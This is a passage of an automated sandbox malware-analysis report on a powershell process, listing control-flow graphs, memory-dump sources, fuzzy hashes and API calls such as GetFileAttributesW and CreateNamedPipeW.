8481d27 SetThreadUILanguage 66191->66195 66192 8481e10 66192->66173 66193 8481de7 66193->66192 66196 8481dab SetThreadUILanguage 66193->66196 66197 8481dc0 SetThreadUILanguage 66193->66197 66194->66193 66195->66193 66196->66192 66197->66192 66199 8481dad 66198->66199 66202 8481d38 SetThreadUILanguage 66199->66202 66203 8481d27 SetThreadUILanguage 66199->66203 66200 8481de7 66201 8481e10 66200->66201 66204 8481dab SetThreadUILanguage 66200->66204 66205 8481dc0 SetThreadUILanguage 66200->66205 66201->66173 66202->66200 66203->66200 66204->66201 66205->66201 66234 826c6f8 66235 826c736 66234->66235 66236 826cd6e 66235->66236 66237 826c783 66235->66237 66240 48947e8 66235->66240 66245 48947d8 66235->66245 66242 48947f2 66240->66242 66241 4894817 66241->66237 66242->66241 66250 4894890 66242->66250 66255 48948a0 66242->66255 66246 48947e8 66245->66246 66247 4894890 GetFileAttributesW 66246->66247 66248 48948a0 GetFileAttributesW 66246->66248 66249 4894817 66246->66249 66247->66249 66248->66249 66249->66237 66251 48948a0 66250->66251 66260 4894908 66251->66260 66270 4894918 66251->66270 66252 48948d1 66252->66241 66256 48948b3 66255->66256 66258 4894908 GetFileAttributesW 66256->66258 66259 4894918 GetFileAttributesW 66256->66259 66257 48948d1 66257->66241 66258->66257 66259->66257 66261 4894918 66260->66261 66262 4894a35 66261->66262 66263 48949f3 66261->66263 66267 4895ff1 GetFileAttributesW 66261->66267 66268 4896000 GetFileAttributesW 66261->66268 66280 4896325 66261->66280 66262->66252 66263->66262 66264 4895ff1 GetFileAttributesW 66263->66264 66265 4896000 GetFileAttributesW 66263->66265 66266 4896325 GetFileAttributesW 66263->66266 66264->66262 66265->66262 66266->66262 66267->66263 66268->66263 66271 489492d 66270->66271 66272 4894a35 66271->66272 66276 4895ff1 GetFileAttributesW 66271->66276 66277 48949f3 66271->66277 66278 4896000 GetFileAttributesW 66271->66278 66279 4896325 GetFileAttributesW 66271->66279 66272->66252 66273 4895ff1 GetFileAttributesW 66273->66272 66274 4896000 GetFileAttributesW 66274->66272 66275 4896325 GetFileAttributesW 66275->66272 66276->66277 66277->66272 66277->66273 66277->66274 66277->66275 66278->66277 66279->66277 66281 489633a 66280->66281 66283 48964e0 GetFileAttributesW 66281->66283 66284 48964f0 GetFileAttributesW 66281->66284 66282 489637a 66282->66263 66283->66282 66284->66282

                            Executed Functions

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 288 8264a90-8264ab0 445 8264ab3 call 82651d7 288->445 446 8264ab3 call 82651d8 288->446 289 8264ab9-8264ad6 291 8264adc-8264ae5 289->291 292 826500a-8265011 289->292 293 82651bf-82651d6 291->293 294 8264aeb-8264b09 291->294 299 8264b21-8264b30 294->299 300 8264b0b-8264b1b 294->300 303 8264ff8-8265004 299->303 304 8264b36-8264b42 299->304 300->299 300->303 303->291 303->292 306 8264b44-8264b46 304->306 307 8264b48-8264b59 304->307 308 8264b5f-8264b61 306->308 307->308 309 8264b67-8264b72 308->309 310 8264e51-8264e5d 308->310 309->310 316 8264b78-8264b92 309->316 314 8264e63-8264e74 310->314 315 8264e5f-8264e61 310->315 317 8264e7a-8264e7c 314->317 315->317 316->303 324 8264b98-8264ba5 316->324 317->303 320 8264e82-8264e8d 317->320 320->303 323 8264e93-8264ead 320->323 323->303 331 8264eb3-8264eb8 323->331 327 8264bb6 324->327 328 8264ba7-8264bb4 324->328 330 8264bbb-8264bbd 327->330 328->330 330->303 332 8264bc3-8264bc9 330->332 333 8264ec6 331->333 334 8264eba-8264ec4 331->334 335 8264be2-8264c30 332->335 336 8264bcb-8264bdc 332->336 337 8264ecb-8264ecd 333->337 334->337 359 8264c65-8264c88 335->359 360 8264c32-8264c5e 335->360 336->335 343 8265014-8265053 336->343 337->303 338 8264ed3-8264ed9 337->338 341 8264ef1-8264f2f 338->341 342 8264edb-8264eeb 338->342 370 8264f31-8264f34 341->370 371 8264f3c-8264f42 341->371 342->341 349 82650e5-826512a 342->349 362 8265055-826505f 343->362 363 826506a-82650de 343->363 372 8265141-82651b8 349->372 373 826512c-8265136 349->373 378 8264c8e-8264c94 359->378 379 8264dcd-8264df6 359->379 360->359 362->363 363->349 370->371 376 8264f77-8264fb2 371->376 377 8264f44-8264f70 371->377 372->293 373->372 376->303 403 8264fb4-8264fed 376->403 377->376 381 8264c96-8264cc2 378->381 382 8264cc9-8264d06 378->382 379->303 401 8264dfc-8264e40 379->401 381->382 420 8264d92-8264dab 382->420 421 8264d0c-8264d6b 382->421 401->303 403->303 427 8264db6-8264db7 420->427 428 8264dad 420->428 441 8264d6d-8264d70 421->441 442 8264d78-8264d8c 421->442 427->379 428->427 441->442 442->420 442->421 445->289 446->289
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J$`J$`J$`J$`J$`J
                            • API String ID: 0-2726738753
                            • Opcode ID: 20562747afa4a20fbc0fe87986a543a2ad4068f03ef8cee85df09fa0a006f8e0
                            • Instruction ID: 67c6658954d67b64fa941a528ebe663ac7bd92d489ff549026d2bf2da11ac3fb
                            • Opcode Fuzzy Hash: 20562747afa4a20fbc0fe87986a543a2ad4068f03ef8cee85df09fa0a006f8e0
                            • Instruction Fuzzy Hash: 4B129E307102099FCB14EF64D455BAEBBE6EF84305F148968E842AB3A5DF34ED46CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 930 842c6e0-842c722 933 842c7aa-842c7c6 930->933 934 842c728-842c74a 930->934 941 842c935-842c964 933->941 942 842c7cc-842c7d2 933->942 937 842c8c0-842c92e 934->937 938 842c750-842c766 934->938 937->941 1046 842c769 call 842d910 938->1046 1047 842c769 call 842d920 938->1047 950 842c96b-842c99a 941->950 944 842c7d4-842c7e4 942->944 945 842c7ea-842c7f1 942->945 943 842c76b-842c789 958 842c8b4-842c8bd 943->958 959 842c78f-842c7a5 943->959 944->941 944->945 949 842c7f7-842c7fe 945->949 945->950 952 842c800-842c810 949->952 953 842c816-842c84e 949->953 964 842c9a1-842ca45 950->964 952->953 952->964 974 842c850-842c869 953->974 975 842c86b-842c87b 953->975 959->958 1048 842ca47 call 842d368 964->1048 1049 842ca47 call 842d378 964->1049 974->975 983 842c87d-842c883 974->983 975->958 984 842c894 983->984 985 842c885-842c892 983->985 988 842c899-842c8b2 984->988 985->988 988->958 997 842ca4d-842ca83 1001 842ccd4-842ccf6 997->1001 1002 842ca89-842ca99 997->1002 1004 842cd01 1001->1004 1005 842ccf8 1001->1005 1007 842cac1-842cac5 1002->1007 1008 842ca9b-842cabc 1002->1008 1009 842cd02 1004->1009 1005->1004 1010 842cac7-842cae5 1007->1010 1011 842caef-842cafd 1007->1011 1013 842ccc3-842ccce 1008->1013 1009->1009 1010->1011 1044 842cb00 call 842e6c8 1011->1044 1045 842cb00 call 842e6b8 1011->1045 1013->1001 1013->1002 1015 842cb06-842cb08 1016 842cc95-842cc99 1015->1016 1017 842cb0e-842cb90 1015->1017 1016->1013 1018 842cc9b-842ccb9 1016->1018 1030 842cb92-842cb95 1017->1030 1031 842cb98-842cbd9 1017->1031 1018->1013 1030->1031 1033 842cc36-842cc4b 1031->1033 1034 842cbdb-842cbe2 1031->1034 1033->1016 1036 842cbe4-842cc1c 1034->1036 1037 842cc25-842cc34 1034->1037 1036->1037 1043 842cc1e-842cc21 1036->1043 1037->1033 1037->1034 1043->1037 1044->1015 1045->1015 1046->943 1047->943 1048->997 1049->997
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J$`J$`J$`J
                            • API String ID: 0-2501499896
                            • Opcode ID: d2780ec662eee84364cec3f9808896c2c3484ef7ac3b963bd41626433efd3381
                            • Instruction ID: ae4b9cf08164952c52acd64304e84081b235d807fb4cd94f61bd7ef89f595de2
                            • Opcode Fuzzy Hash: d2780ec662eee84364cec3f9808896c2c3484ef7ac3b963bd41626433efd3381
                            • Instruction Fuzzy Hash: 72C1AD70B04215DFCB059FA4C895BAE7BBAFF88305F14842DE9029B391DB799D42CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1148 8498e68-8498e75 1149 8498e87-8498ea2 1148->1149 1150 8498e77-8498e7a 1148->1150 1154 8498ea8-8498f74 1149->1154 1155 8498f83-8498fbb 1149->1155 1151 8498e80-8498e86 1150->1151 1152 8498f75-8498f82 1150->1152 1160 84991b9-84991c9 1155->1160 1161 8498fc1-8498fe0 call 8491048 1155->1161 1163 84992d8-84992fd 1160->1163 1164 84991cf-84991d5 1160->1164 1174 8498fee-8498ff1 1161->1174 1175 8498fe2-8498fe5 1161->1175 1191 84992ff-8499306 1163->1191 1164->1163 1165 84991db-84991f7 1164->1165 1185 84991fd-849921a 1165->1185 1186 8499296-84992d6 call 8497f08 1165->1186 1176 8498ff8-8499032 1174->1176 1177 8498ff3-8498ff6 1174->1177 1179 8499037-849903f 1175->1179 1180 8498fe7-8498fea 1175->1180 1176->1191 1177->1176 1182 849904c-8499050 1177->1182 1192 8499047 1179->1192 1180->1179 1181 8498fec 1180->1181 1181->1182 1187 84990fd-8499125 1182->1187 1188 8499056-849906e 1182->1188 1210 849921c-8499222 1185->1210 1211 8499232-8499294 1185->1211 1186->1191 1223 849913d-8499185 1187->1223 1224 8499127-849912d 1187->1224 1206 8499070-8499076 1188->1206 1207 8499086-84990dd 1188->1207 1192->1191 1212 8499078 1206->1212 1213 849907a-849907c 1206->1213 1243 8499309-8499331 1207->1243 1244 84990e3-84990f8 1207->1244 1218 8499224 1210->1218 1219 8499226-8499228 1210->1219 1211->1191 1212->1207 1213->1207 1218->1211 1219->1211 1245 849918d-84991b4 1223->1245 1228 849912f 1224->1228 1229 8499131-8499133 1224->1229 1228->1223 1229->1223 1250 8499379-8499384 1243->1250 1251 8499333-8499338 1243->1251 1244->1245 1245->1191 1251->1250 1252 849933a-849935b 1251->1252 1255 849935d-8499365 1252->1255 1256 8499385-849942a 1252->1256 1255->1250 1258 8499367-8499371 1255->1258 1261 849942c-849942f 1256->1261 1262 8499432-849945d 1256->1262 1258->1250 1261->1262 1264 849945f-8499465 1262->1264 1265 8499466-8499487 1262->1265 1264->1265
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15285845549.0000000008490000.00000040.00000010.sdmp, Offset: 08490000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8490000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: ^Gl$^Gl$^Gl
                            • API String ID: 0-1549560346
                            • Opcode ID: a68561b345a8e92301e71b43576bfe8fb5a9736cb0b42d5a06672e663a5f8bb1
                            • Instruction ID: 8146c7cb9ba4f8a76653ffed63ecc1cb26c36ef9c51043ed201a3e74547e9027
                            • Opcode Fuzzy Hash: a68561b345a8e92301e71b43576bfe8fb5a9736cb0b42d5a06672e663a5f8bb1
                            • Instruction Fuzzy Hash: B202DD70B002009FDB259B75D855BAEBFF2EF89311F14886EE456DB391CB359806CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1267 4898fc0-4898fc9 1269 4898fcb-4898feb 1267->1269 1270 489901e-489a37f call 4893260 1267->1270 1269->1270 1531 489a38b-489a39e 1270->1531 1720 489a39e call 489d5f8 1531->1720 1721 489a39e call 489d608 1531->1721 1533 489a3a4-489a3a7 1534 489a3a9-489a3ae 1533->1534 1535 489a3b0 1533->1535 1536 489a3b7-489b142 call 4896000 1534->1536 1535->1536 1720->1533 1721->1533
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15259086599.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_4890000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: fum$ fum
                            • API String ID: 0-3240418567
                            • Opcode ID: 248cad0b945c6f27526353a05537b2d58f8ca7d325fe4f23a51ca217e9db267c
                            • Instruction ID: 770d988f6f1af57acee25fa32834a2a6e93a2f8a60a19ba4c8901d5af2eafe5e
                            • Opcode Fuzzy Hash: 248cad0b945c6f27526353a05537b2d58f8ca7d325fe4f23a51ca217e9db267c
                            • Instruction Fuzzy Hash: 48034C34A102188FDB55DB60D851BEE7BB3FB88309F1084A8E9496B394CF36AD85DF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1841 4899018-489a37f call 4893260 2100 489a38b-489a39e 1841->2100 2289 489a39e call 489d5f8 2100->2289 2290 489a39e call 489d608 2100->2290 2102 489a3a4-489a3a7 2103 489a3a9-489a3ae 2102->2103 2104 489a3b0 2102->2104 2105 489a3b7-489b142 call 4896000 2103->2105 2104->2105 2289->2102 2290->2102
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15259086599.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_4890000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: fum$ fum
                            • API String ID: 0-3240418567
                            • Opcode ID: 32c20409f4824fe63658ecdee4fcfe2c48bc2ff86b9d8ae24e820fc3b990f2ed
                            • Instruction ID: e73f88b630c53ac198e06061ff175e35358b44f25486112f80cfc45478ee76dc
                            • Opcode Fuzzy Hash: 32c20409f4824fe63658ecdee4fcfe2c48bc2ff86b9d8ae24e820fc3b990f2ed
                            • Instruction Fuzzy Hash: 04033B34A102188FDB55DB60D851BEE7BB3FB88309F1084A8E9496B394CF36AD85DF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15259086599.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_4890000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: fum$ fum
                            • API String ID: 0-3240418567
                            • Opcode ID: 998eace0e12a76d6c79a4be30fe13d29650525b635824971d426352e7ac67dd1
                            • Instruction ID: bf987401d41d8e9b78a4ca182cdedff4b83c24d69677fd6b9aebd0ce77c76e9f
                            • Opcode Fuzzy Hash: 998eace0e12a76d6c79a4be30fe13d29650525b635824971d426352e7ac67dd1
                            • Instruction Fuzzy Hash: D7033B34A102188FDB55DB60D851BEE7BB3FB88309F1084A8E9496B394CF36AD85DF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15285679449.0000000008480000.00000040.00000010.sdmp, Offset: 08480000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8480000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: ^Gl$^Gl$`J
                            • API String ID: 0-2267862545
                            • Opcode ID: 3ac4d56378e74ff7e2883ef5cf890be9a2b7da6d05922040bce5092bdfba198e
                            • Instruction ID: 7a6203e57893bf375d2ea46e274d4a75b5ac8b3a15fdad6b0dae1c00e5289ad0
                            • Opcode Fuzzy Hash: 3ac4d56378e74ff7e2883ef5cf890be9a2b7da6d05922040bce5092bdfba198e
                            • Instruction Fuzzy Hash: 83E16B74B10604CFCB04EB78D898AADBBF6EF88315B15856AE5069B361DB35EC05CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (tm$`J
                            • API String ID: 0-1344084950
                            • Opcode ID: 37aec6679b8b5352065c2a2c280eb3e27ab09c3ba9d7f3c477bad9f77706e432
                            • Instruction ID: 24aae0e7216450b79ff06d7ef7b8d013d0e77e6f8ac38c08a42f20d94eb1c9f6
                            • Opcode Fuzzy Hash: 37aec6679b8b5352065c2a2c280eb3e27ab09c3ba9d7f3c477bad9f77706e432
                            • Instruction Fuzzy Hash: A0B19B71E1061ADFCB14DF64C8506DEF7F2BF89315F1085A9D909AB250EB70AD8ACB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15285845549.0000000008490000.00000040.00000010.sdmp, Offset: 08490000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8490000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5b6409bd8185b0304661b7bb42e3b76b19c5cf96212aa24a05d6c28e744417a3
                            • Instruction ID: 659f30322b82ff9d9cc6508aa193bfa48d1c05da7b17e15663df480968edef33
                            • Opcode Fuzzy Hash: 5b6409bd8185b0304661b7bb42e3b76b19c5cf96212aa24a05d6c28e744417a3
                            • Instruction Fuzzy Hash: 55032C34B01314DFEB69AF308C157AD76B2AB85705F2085BDE50A9A3D4DF7A9A81CF40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15285845549.0000000008490000.00000040.00000010.sdmp, Offset: 08490000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8490000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: ^Gl
                            • API String ID: 0-1583963924
                            • Opcode ID: 86ea76ab8aa7644c451856c45136e9f2254b749638a08b616b06f8e4e33f9d8f
                            • Instruction ID: c5bf2a05fa3576fdee407ba97881e90fb0d6f53c5c8c712812b4ac87276eb6d3
                            • Opcode Fuzzy Hash: 86ea76ab8aa7644c451856c45136e9f2254b749638a08b616b06f8e4e33f9d8f
                            • Instruction Fuzzy Hash: 13029D2060A7C95BCB56CB3CD49815AFFA19F82234B6D99EEC1CC8F543CA269847C747
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 083C5D88
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284169334.00000000083C0000.00000040.00000001.sdmp, Offset: 083C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_83c0000_powershell.jbxd
                            Similarity
                            • API ID: CreateNamedPipe
                            • String ID:
                            • API String ID: 2489174969-0
                            • Opcode ID: 31153a43395b99a3f56f8f22744d8e0c7568c25dea476a0682421652578938b7
                            • Instruction ID: d8efc14741be3b407b460a7312550c111f07c40ec0c83ec47da6acb54989f979
                            • Opcode Fuzzy Hash: 31153a43395b99a3f56f8f22744d8e0c7568c25dea476a0682421652578938b7
                            • Instruction Fuzzy Hash: DE51E371D013489FDB14CFA9D988B9EBBF6BF88314F25852AE408AB250D7B4A940CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15284169334.00000000083C0000.00000040.00000001.sdmp, Offset: 083C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_83c0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9e8df2c603fff76e6b25219ee3f6a7706aa681f0ad76e4033e00c94b6ec9d22b
                            • Instruction ID: e6f28323fd1f72737f907f63f287756c5667109328e47facc86792521eecee93
                            • Opcode Fuzzy Hash: 9e8df2c603fff76e6b25219ee3f6a7706aa681f0ad76e4033e00c94b6ec9d22b
                            • Instruction Fuzzy Hash: 6642C130A00215DFEB159B64C850BEDB7B6EF89304F1085AAE8497B395DF71AD81CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d7e51e7acba6148fa8277758fd935f36d51d80f2042ea4b11cd12a3c4fcca76c
                            • Instruction ID: 404cddb814fbdaefecfd66ba579d4bd331553ab5d96b39e5508a1565a6f6b1de
                            • Opcode Fuzzy Hash: d7e51e7acba6148fa8277758fd935f36d51d80f2042ea4b11cd12a3c4fcca76c
                            • Instruction Fuzzy Hash: DC227F34B10205DFDB04DBB5C890AAEBBB6EF88355F118069E902EB395DB75EC52CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ab6b597465ceb9291900419425e6795ccf3db3fc0cf006ca58dfa6b42f36e22b
                            • Instruction ID: c1e40d8bdaf82c6cd279b50113d078187087ae253837818062490e2d6103c972
                            • Opcode Fuzzy Hash: ab6b597465ceb9291900419425e6795ccf3db3fc0cf006ca58dfa6b42f36e22b
                            • Instruction Fuzzy Hash: E5F19D30B10206DBDF19DF65C8886AE77B2FF84316F50856DD901AB395EB75E892CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15284169334.00000000083C0000.00000040.00000001.sdmp, Offset: 083C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_83c0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 933f05f4765c52d21c693a5f19969da5ed6f92205c8c5f149e0ce5d4b895d46b
                            • Instruction ID: fe6aaebd0f9c861d53f416836cc713cee979105a3f0a21a314ea60381b119510
                            • Opcode Fuzzy Hash: 933f05f4765c52d21c693a5f19969da5ed6f92205c8c5f149e0ce5d4b895d46b
                            • Instruction Fuzzy Hash: B6E1D330A002159FEB15AB74C850BEDB7B6EF89304F1085AAE4097B395DF71AD85CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 785 8420040-8420079 787 8420128-8420134 call 842bbb9 785->787 788 842007f-8420086 785->788 791 842013a-842013c 787->791 789 842050f-8420533 788->789 790 842008c-84200a9 788->790 815 842053a-842056a 789->815 801 84200ab-84200c1 790->801 802 84200c9-84200de 790->802 794 8420150-842016b 791->794 795 842013e-842014e 791->795 808 842017f 794->808 809 842016d-842017d 794->809 800 8420181-842018b 795->800 805 8420196-842019c 800->805 806 842018d 800->806 801->802 928 84200e1 call 8420bc0 802->928 929 84200e1 call 8420bb0 802->929 811 84201a2-84201a4 805->811 812 8420433-8420437 805->812 806->805 808->800 809->800 811->812 816 84201aa-84201ac 811->816 813 8420448-842044f 812->813 814 8420439-8420446 812->814 820 8420451-8420453 813->820 821 8420455-842045f 813->821 825 842048e-8420492 814->825 863 8420571-84205a1 815->863 817 84201b2-84201b6 816->817 818 8420425-8420428 816->818 817->815 824 84201bc-84201c6 817->824 818->825 819 84200e7-8420125 827 8420467-842046b 820->827 821->827 824->815 829 84201cc-84201d2 824->829 830 8420494-84204b4 825->830 831 84204ba-84204d0 825->831 833 842048b 827->833 834 842046d-8420489 827->834 835 84201e4-84201f3 829->835 836 84201d4-84201de 829->836 830->831 843 84205a8-84206c1 830->843 844 84204d2-84204d5 831->844 845 84204de-842050c 831->845 833->825 834->833 848 84201f5-84201f9 835->848 849 842024d-8420263 835->849 836->815 836->835 844->845 854 84201fb-8420211 848->854 855 8420219-8420228 848->855 852 84202f7-84202fe 849->852 853 8420269-842029b 849->853 859 8420300-8420316 852->859 860 842031e-8420377 852->860 882 84202bb-84202f2 853->882 883 842029d-84202b3 853->883 854->855 855->863 868 842022e-8420247 855->868 859->860 900 8420397-84203b1 860->900 901 8420379-842038f 860->901 863->843 868->849 868->863 882->825 883->882 909 84203b3-84203c5 900->909 910 84203fe-8420417 900->910 901->900 916 84203c7-84203dd 909->916 917 84203e5-84203fc 909->917 914 8420422 910->914 915 8420419 910->915 914->818 915->914 916->917 917->909 917->910 928->819 929->819
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J$`J$`J$`J
                            • API String ID: 0-2501499896
                            • Opcode ID: a5fabf5e546e9cf723113f9c4d04d33d1704ce74361d74cc8fc2fb617d58cd46
                            • Instruction ID: 9d00118239ba2670bdea531db2e8e65e0700fb7d9b66c3280b79fad217e154b7
                            • Opcode Fuzzy Hash: a5fabf5e546e9cf723113f9c4d04d33d1704ce74361d74cc8fc2fb617d58cd46
                            • Instruction Fuzzy Hash: 5B227E30B00618DFCB14DFA8D554AAEB7F6EF88705F1044A9E806AB3A1CB75ED45CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1050 842b638-842b646 1051 842b654 1050->1051 1052 842b648-842b652 1050->1052 1053 842b659-842b65b 1051->1053 1052->1053 1054 842b732-842b749 1053->1054 1055 842b661-842b665 1053->1055 1056 842b750-842b767 1054->1056 1055->1056 1057 842b66b-842b68c 1055->1057 1067 842b76e-842b82a 1056->1067 1064 842b69a 1057->1064 1065 842b68e-842b698 1057->1065 1066 842b69f-842b6a1 1064->1066 1065->1066 1066->1067 1068 842b6a7-842b6ae 1066->1068 1086 842b86f-842b885 1067->1086 1087 842b82c-842b843 1067->1087 1069 842b6b0 1068->1069 1070 842b6b4-842b6d1 1068->1070 1069->1070 1113 842b6d4 call 842b9a5 1070->1113 1114 842b6d4 call 842b9b8 1070->1114 1115 842b6d4 call 842ba38 1070->1115 1077 842b6da-842b724 call 842c6e0 1082 842b72a-842b72f 1077->1082 1090 842b887 1086->1090 1091 842b88c-842b89a 1086->1091 1092 842b845 1087->1092 1093 842b84c-842b86d 1087->1093 1090->1091 1096 842b8aa-842b8e3 1091->1096 1097 842b89c-842b8a2 1091->1097 1092->1093 1093->1086 1100 842b945-842b963 1096->1100 1101 842b8e5-842b8f4 1096->1101 1097->1096 1105 842b964 1100->1105 1103 842b8f6 1101->1103 1104 842b8fb-842b927 1101->1104 1103->1104 1108 842b931-842b943 1104->1108 1109 842b929 1104->1109 1105->1105 1108->1100 1108->1101 1109->1108 1113->1077 1114->1077 1115->1077
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J$`J$`J$;'
                            • API String ID: 0-924501989
                            • Opcode ID: b50ee3df653ee184877343bb08951496ada0893ffeb0ed7aed82b8ecdd182e6f
                            • Instruction ID: 031b83279b6e3b9cebddae30664f7e2255096407a49adc646f7361efa57854ea
                            • Opcode Fuzzy Hash: b50ee3df653ee184877343bb08951496ada0893ffeb0ed7aed82b8ecdd182e6f
                            • Instruction Fuzzy Hash: F4910070A04319DBCB15DFA5C8147AEBBF6EF84315F14882EE806AB390DF749D468B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'pm$^Gl$cpm
                            • API String ID: 0-278567801
                            • Opcode ID: afb64ee4b9121975b6bfa93280d5a08c45515c98f34512a6a79a0ad95a145102
                            • Instruction ID: 0e20aef779e92bf20fefc0f1e2f16ebd169cca2e853f444b2bbcbd5dcf88cc09
                            • Opcode Fuzzy Hash: afb64ee4b9121975b6bfa93280d5a08c45515c98f34512a6a79a0ad95a145102
                            • Instruction Fuzzy Hash: 9741E4317042104FD708AB7899A4BBE36D68FCA715F1645BAE50ACF3A1DE25CC0687A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J$`J
                            • API String ID: 0-2628089347
                            • Opcode ID: bcc29b5342cc6b940e74c09afd18fbd0d876dd414967d39e11d8d8f8181ed34c
                            • Instruction ID: 3a16d7cc938fbf7f8ed150e1d823660bef939e9b286e130239aeaa2ee7fe3a2d
                            • Opcode Fuzzy Hash: bcc29b5342cc6b940e74c09afd18fbd0d876dd414967d39e11d8d8f8181ed34c
                            • Instruction Fuzzy Hash: 1E227F30A20219DFCB14EF64D444AADBBF2BF88325F11456CD846AB360DB75ED85CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
